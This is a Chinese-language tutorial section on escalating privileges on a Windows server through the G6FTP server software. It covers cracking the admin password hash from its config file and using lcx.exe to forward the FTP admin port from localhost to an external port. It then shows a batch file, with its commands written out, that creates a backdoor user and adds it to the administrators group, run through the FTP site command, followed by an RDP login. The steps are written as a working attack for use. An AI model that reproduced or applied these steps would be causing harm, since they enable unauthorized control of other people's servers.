15、第三方软件提权：g6ftp提权

1、下载管理配置文件，将administrator管理密码**，利用md5解密。

找到g6ftp目录下的renoteadmin目录，编辑renote.ini文件，用md5解密password

cmd5.com

我们安装完g6ftp的时候先别启动，需要先结束g6ftpserver进程，随后利用工具进行**：

将该压缩包解压到g6ftp的安装目录，替换文件即可。

2、使用lcx端口转发（默认只允许本机连接），g6ftp默认只监听127.0.0.1 8021端口，用户在外网访问不了g6ftp外网8021端口，g6ftp只监听服务器127.0.0.1 8021端口，需要将8021转发成8027端口，将8027监听在服务器的所有地方上，这时候我们就可以在外网访问服务器外网的8027端口就相对于访问8021端口。

我们要先上传lcx.exe和cmd.exe到服务器上的可读可写目录下。

cmd来到lcx目录：lcx.exe -tran 8027 127.0.0.1 8021

3、使用客户端以管理员用户登录

4、创建用户并设置权限：

创建执行的批处理文件：xx.bat

net user lala 123 /add

net localgroup administrator lala /add

上传批处理

5、用已创建的普通用户登录ftp

6、执行命令 quote site adduser【上面我们添加的命令】

7、接着用批处理创建的用户来连接3389即可。